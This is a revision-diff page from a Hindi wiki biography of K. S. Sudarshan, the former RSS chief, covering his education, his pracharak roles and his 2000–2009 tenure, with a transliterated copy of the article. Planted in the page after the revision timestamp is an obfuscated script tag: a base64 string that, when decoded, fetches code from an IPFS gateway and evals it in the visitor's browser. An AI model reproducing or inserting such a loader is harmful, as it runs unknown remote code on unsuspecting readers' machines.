Difference between revisions of "के एस सुदर्शन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} के एस सुदर्शन का जन्म छत्तीसगढ़ के रायप...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
के एस सुदर्शन का जन्म छत्तीसगढ़ के रायपुर में 1931 में हुआ था। उन्होंने सागर यूनिवर्सिटी से टेलीकम्युनिकेशंस में बीटेक डिग्री प्राप्त की। महज 9 साल की उम्र में ही उन्होंने पहली बार आर एस एस शाखा में भाग लिया। 1954 में वे संघ के प्रचारक नियुक्त किए गए।
+
राष्ट्रीय स्वयं सेवक संघ (आर एस एस) के पूर्व सरसंघचालक के एस सुदर्शन का जन्म छत्तीसगढ़ के रायपुर में 18 जून, 1931 में हुआ था। उन्होंने सागर यूनिवर्सिटी से टेलीकम्युनिकेशंस में बीटेक डिग्री प्राप्त की। महज 9 साल की उम्र में ही उन्होंने पहली बार आर एस एस शाखा में भाग लिया। 1954 में पहली बार सुदर्शन आरएसएस के प्रचारक बने।
  
1964 में रायगढ़ जिले में सुदर्शन बतौर संघ के प्रचारक बनाए गए। बाद में वे मध्य प्रदेश के प्रांत प्रचारक बने। इसके बाद संघ में उन्होंने कई तरह की अहम जिम्मेदारियां संभाली। सुदर्शन करीब छह दशकों तक आर एस एस प्रचारक रहे। 2000 में वे सरसंघचालक बने और 2009 तक इस पद पर रहे।
+
1964 में रायगढ़ जिले में सुदर्शन बतौर संघ के प्रचारक बनाए गए। बाद में वे मध्य प्रदेश के प्रांत प्रचारक बने। इसके बाद संघ में उन्होंने कई तरह की अहम जिम्मेदारियां संभाली। सुदर्शन करीब छह दशकों तक आर एस एस प्रचारक रहे। 10 मार्च, 2000 को आरएसएस प्रमुख बने। 21 मार्च, 2009 तक वह इस पद पर रहे। बीजेपी की हार के बाद 2005 में के एस सुदर्शन ने कहा था लालकृष्ण आडवाणी और अटल बिहारी वाजपेयी को युवा पीढ़ी के नेताओं के लिए अब जगह बनानी होगी। वह संघ के अंदर एनडीए सरकार की आर्थिक नीतियों के आलोचक रहे थे।
  
  

Revision as of 13:37, 15 September 2012

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

rashtriy svayan sevak sangh (ar es es) ke poorv sarasanghachalak ke es sudarshan ka janm chhattisagadh ke rayapur mean 18 joon, 1931 mean hua tha. unhoanne sagar yoonivarsiti se telikamyunikeshans mean bitek digri prapt ki. mahaj 9 sal ki umr mean hi unhoanne pahali bar ar es es shakha mean bhag liya. 1954 mean pahali bar sudarshan areses ke pracharak bane.

1964 mean rayagadh jile mean sudarshan bataur sangh ke pracharak banae ge. bad mean ve madhy pradesh ke praant pracharak bane. isake bad sangh mean unhoanne kee tarah ki aham jimmedariyaan sanbhali. sudarshan karib chhah dashakoan tak ar es es pracharak rahe. 10 march, 2000 ko areses pramukh bane. 21 march, 2009 tak vah is pad par rahe. bijepi ki har ke bad 2005 mean ke es sudarshan ne kaha tha lalkrishna adavani aur atal bihari vajapeyi ko yuva pidhi ke netaoan ke lie ab jagah banani hogi. vah sangh ke aandar enadie sarakar ki arthik nitiyoan ke alochak rahe the.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh